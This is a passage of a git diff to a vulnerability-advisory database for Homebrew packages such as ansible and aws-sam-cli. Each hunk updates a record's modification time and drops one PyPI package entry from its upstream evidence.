"ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54277.json b/advisories/BREW-ansible@13-CVE-2026-54277.json index f6d33b0127..6a8ecd45a9 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54277.json +++ b/advisories/BREW-ansible@13-CVE-2026-54277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54277", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-63hw-fmq6-xxg2", "CVE-2026-54277", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54278.json b/advisories/BREW-ansible@13-CVE-2026-54278.json index 52fd6f7ede..ab1a5a51f5 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54278.json +++ b/advisories/BREW-ansible@13-CVE-2026-54278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54278", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g3cq-j2xw-wf74", "CVE-2026-54278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54279.json b/advisories/BREW-ansible@13-CVE-2026-54279.json index ce018a83f2..16596707e1 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54279.json +++ b/advisories/BREW-ansible@13-CVE-2026-54279.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54279", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-2fqr-mr3j-6wp8", "CVE-2026-54279", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54280.json b/advisories/BREW-ansible@13-CVE-2026-54280.json index 744fc7d5f8..1548ca61d5 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54280.json +++ b/advisories/BREW-ansible@13-CVE-2026-54280.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54280", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9x8q-7h8h-wcw9", "CVE-2026-54280", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-57585.json b/advisories/BREW-ansible@13-CVE-2026-57585.json index fdacd99eb9..3a7337377c 100644 --- a/advisories/BREW-ansible@13-CVE-2026-57585.json +++ b/advisories/BREW-ansible@13-CVE-2026-57585.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-57585", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6v7p-g79w-8964", "CVE-2026-57585", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "msgpack", - "subject_version": "1.2.1", - "key": "pkg:pypi/msgpack@1.2.1", - "resource": "msgpack" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59881.json b/advisories/BREW-ansible@13-CVE-2026-59881.json index bc3473decd..5214ef056d 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59881.json +++ b/advisories/BREW-ansible@13-CVE-2026-59881.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59881", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mq44-7p77-q5h7", "CVE-2026-59881", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59884.json b/advisories/BREW-ansible@13-CVE-2026-59884.json index 0deaab51ef..6056b7f6c3 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59884.json +++ b/advisories/BREW-ansible@13-CVE-2026-59884.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59884", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m4p7-r5rc-7g4j", "CVE-2026-59884", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59885.json b/advisories/BREW-ansible@13-CVE-2026-59885.json index 2454c787b2..f5037c5125 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59885.json +++ b/advisories/BREW-ansible@13-CVE-2026-59885.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59885", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8ppf-4f7h-5ppj", "CVE-2026-59885", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59886.json b/advisories/BREW-ansible@13-CVE-2026-59886.json index d4ee8796f2..779eef34be 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59886.json +++ b/advisories/BREW-ansible@13-CVE-2026-59886.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59886", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hm4w-wwcw-mr6r", "CVE-2026-59886", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-59890.json b/advisories/BREW-ansible@13-CVE-2026-59890.json index 19371b5056..223dcaba6d 100644 --- a/advisories/BREW-ansible@13-CVE-2026-59890.json +++ b/advisories/BREW-ansible@13-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-59890", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-69243.json b/advisories/BREW-ansible@13-CVE-2026-69243.json index 2fd16d18dc..77ab180152 100644 --- a/advisories/BREW-ansible@13-CVE-2026-69243.json +++ b/advisories/BREW-ansible@13-CVE-2026-69243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-69243", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mfx4-hv73-q22v", "CVE-2026-69243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-69244.json b/advisories/BREW-ansible@13-CVE-2026-69244.json index bd05d09a8c..3f227f2a66 100644 --- a/advisories/BREW-ansible@13-CVE-2026-69244.json +++ b/advisories/BREW-ansible@13-CVE-2026-69244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-69244", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cq5v-8q36-5273", "CVE-2026-69244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2013-1633.json b/advisories/BREW-aws-sam-cli-CVE-2013-1633.json index ee422d3584..135e956fc4 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2013-1633.json +++ b/advisories/BREW-aws-sam-cli-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2013-1633", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2013-4314.json b/advisories/BREW-aws-sam-cli-CVE-2013-4314.json index a0ca967e8c..88bdd72218 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2013-4314.json +++ b/advisories/BREW-aws-sam-cli-CVE-2013-4314.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2013-4314", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-6748-36qp-fx6r", "CVE-2013-4314", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2014-0012.json b/advisories/BREW-aws-sam-cli-CVE-2014-0012.json index 2d04dffa9e..5539d08077 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2014-0012.json +++ b/advisories/BREW-aws-sam-cli-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2014-0012", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2014-1402.json b/advisories/BREW-aws-sam-cli-CVE-2014-1402.json index 43ce867915..7aba9985ae 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2014-1402.json +++ b/advisories/BREW-aws-sam-cli-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2014-1402", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2014-1829.json b/advisories/BREW-aws-sam-cli-CVE-2014-1829.json index 76e6b33db0..8752b78e94 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2014-1829.json +++ b/advisories/BREW-aws-sam-cli-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2014-1829", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2014-1830.json b/advisories/BREW-aws-sam-cli-CVE-2014-1830.json index 94c5191a3b..15e419c529 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2014-1830.json +++ b/advisories/BREW-aws-sam-cli-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2014-1830", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2015-2296.json b/advisories/BREW-aws-sam-cli-CVE-2015-2296.json index 04a8dfca89..ceb7d26f34 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2015-2296.json +++ b/advisories/BREW-aws-sam-cli-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2015-2296", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2015-8557.json b/advisories/BREW-aws-sam-cli-CVE-2015-8557.json index 84bc3eb25c..27bdbace8e 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2015-8557.json +++ b/advisories/BREW-aws-sam-cli-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2015-8557", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2016-10516.json b/advisories/BREW-aws-sam-cli-CVE-2016-10516.json index b4b9f3e589..f54102d4f1 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2016-10516.json +++ b/advisories/BREW-aws-sam-cli-CVE-2016-10516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2016-10516", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-h2fp-xgx6-xh6f", "CVE-2016-10516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2016-10745.json b/advisories/BREW-aws-sam-cli-CVE-2016-10745.json index 6c5feea3fa..9292a2d409 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2016-10745.json +++ b/advisories/BREW-aws-sam-cli-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2016-10745", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2016-9015.json b/advisories/BREW-aws-sam-cli-CVE-2016-9015.json index e3c88992a3..c8e387dd04 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2016-9015.json +++ b/advisories/BREW-aws-sam-cli-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2016-9015", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2017-18342.json b/advisories/BREW-aws-sam-cli-CVE-2017-18342.json index 86f6b3b9f8..18d19ca013 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2017-18342.json +++ b/advisories/BREW-aws-sam-cli-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2017-18342", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-1000656.json b/advisories/BREW-aws-sam-cli-CVE-2018-1000656.json index 679d706443..b7b148d30c 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-1000656.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-1000656.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-1000656", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-562c-5r94-xh97", "CVE-2018-1000656", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-1000807.json b/advisories/BREW-aws-sam-cli-CVE-2018-1000807.json index ff3107c6da..f1fff8a29c 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-1000807.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-1000807.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-1000807", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-p28m-34f6-967q", "CVE-2018-1000807", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-1000808.json b/advisories/BREW-aws-sam-cli-CVE-2018-1000808.json index d71c5c155d..5a79746b0d 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-1000808.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-1000808.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-1000808", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-2rcm-phc9-3945", "CVE-2018-1000808", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-18074.json b/advisories/BREW-aws-sam-cli-CVE-2018-18074.json index 311ba6e14f..289dec569a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-18074.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-18074", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-20060.json b/advisories/BREW-aws-sam-cli-CVE-2018-20060.json index 6a4bdd2141..5041455311 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-20060.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-20060", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2018-25091.json b/advisories/BREW-aws-sam-cli-CVE-2018-25091.json index 658c8f60fd..fda42d118b 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2018-25091.json +++ b/advisories/BREW-aws-sam-cli-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-25091", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-1010083.json b/advisories/BREW-aws-sam-cli-CVE-2019-1010083.json index 5a0b2be943..ab5b99ed1b 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-1010083.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-1010083.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-1010083", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5wv5-4vpf-pj6m", "CVE-2019-1010083", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-10906.json b/advisories/BREW-aws-sam-cli-CVE-2019-10906.json index 6b47b4af66..f9ee19c97a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-10906.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-10906", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-11236.json b/advisories/BREW-aws-sam-cli-CVE-2019-11236.json index 7cd985c30f..deb9ddb71d 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-11236.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-11236", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": 